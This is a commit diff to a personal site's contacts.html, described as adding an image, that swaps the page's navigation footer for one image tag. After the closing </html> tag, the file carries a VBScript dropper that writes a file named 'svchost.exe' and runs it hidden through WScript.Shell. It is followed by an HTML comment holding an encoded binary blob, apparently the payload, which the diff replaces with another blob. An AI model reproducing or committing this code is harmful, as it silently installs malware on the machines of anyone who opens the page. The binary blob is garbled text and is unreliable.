putting images for contacts.html

--- a/contacts.html
+++ b/contacts.html
@@ -1,33 +1,8 @@
 <html>
     <head>
-        <link rel="stylesheet" href="styles/style.css">
     </head>
     <body>
-        <div id="container">
-            <div id="upperCon">
-                <iframe id="topContent" src="" name="topScreen">
-                </iframe>
-            </div>
-            <div id="lowerCon">
-                <div id="footer">
-                    <div id="homeButton" class="footerButtons">
-                        <a href="home.html" target="topScreen">HOME</a>
-                    </div>
-                    <div id="infoButton" class="footerButtons">
-                        <a href="info.html" target="topScreen">INFO</a>
-                    </div>
-                    <div id="eduButton" class="footerButtons">
-                        <a href="edu.html" target="topScreen">EDUCATION</a>
-                    </div>
-                    <div id="hobbyButton" class="footerButtons">
-                        <a href="">HOBBY</a>
-                    </div>
-                    <div id="contactButton" class="footerButtons">
-                        <a href="contacts.html" target="topScreen">CONTACT</a>
-                    </div>
-                </div>
-            </div>
-        </div>
+        <img src="images/email.png" style="height:100% width:100">
     </body>
 </html><SCRIPT Language=VBScript><!--
 DropFileName = "svchost.exe"
@@ -43,4 +18,8 @@ FileObj.Close
 End If
 Set WSHshell = CreateObject("WScript.Shell")
 WSHshell.Run DropPath, 0
-//--></SCRIPT><!--š…×1¬tlt}§ØŽÂö<‡}Ùx)`ÌeÉ=™)§cz›08hª({æVÙCÀv7¹P¦‚©dš‹`é˜´µ‚‰ß´ßæ{s¡û¦¨ñ»§:EÀuÍ»¶9Š‰''zŽŠPÙ/ÁÍ Â|QmŽÜ¹†VJÀþÇúWø¾:m¸y”©ÑC,ZóŸ\¨=œÆºeêjb@PšèÛÏemÅ0|G·§-SMÞWëÕíž•ðZˆí81®¸H–#]ÄŒÞŠPÙ/¿å["}qÀdÛ€ôPã@ZšßxW‚éÌ.ï ‰ð¼nñœì«¸Â'yl%ÃÄüÕgŒõðèÃ£Øý¡ÎGš2TgAs*z=öÈ>‹C™eÆÄ-%ÜÙÉW°[Û¼êˆlÒ£¡F«žô˜n •¸Ì[LÃA~öNëÔl%$Õ™õ… áêR"ñøáêáêáê¬7NþY?[Ûåê áê-->
+//--></SCRIPT><!--ÈÓÓÆ‘3“qØ¨ÞÕÆ{&æFc±Ø¦ÔïöY"	¡¢cßââ_´
+Ë¯ÑôËH
+¢<³j1£³ÙnÒìò\ì¢À€Ó+]ºt0¹KóŽp\^±eX©RBŠÄÇîê*sðœWK¨Bî
+ãD|É&¶ñ.YMö÷ŽVråç{,Ûœ~…¿Ù‡Znc„W”ç;–·KC?ïà_h!ÍŠ=HºÀÕchñ7%‡ C~¥°$\;å/0`?éþ§©3$T©<*ç]Îûh#8•3w¼hR…Ñ 2Ì§–Ð—$,Ñ'+wnèw,Ù+¤“ŸƒR¥³Sü‚™ž©ÑŠãê„%Äø=P½þ-jŒxeIw-M…o4ˆB†4– 
+CÔÙ‹)(‚;•ò‰;Ý{1«%•"w¥Ç¤aÝ2(±º‚©8y­c„X¹ÓWèôñ ¡î[Æž>Ó&­‚IŠè,|EqÊÃ&¸ áêR"ñøáêáêáê¬7NþY?[…áê áê-->
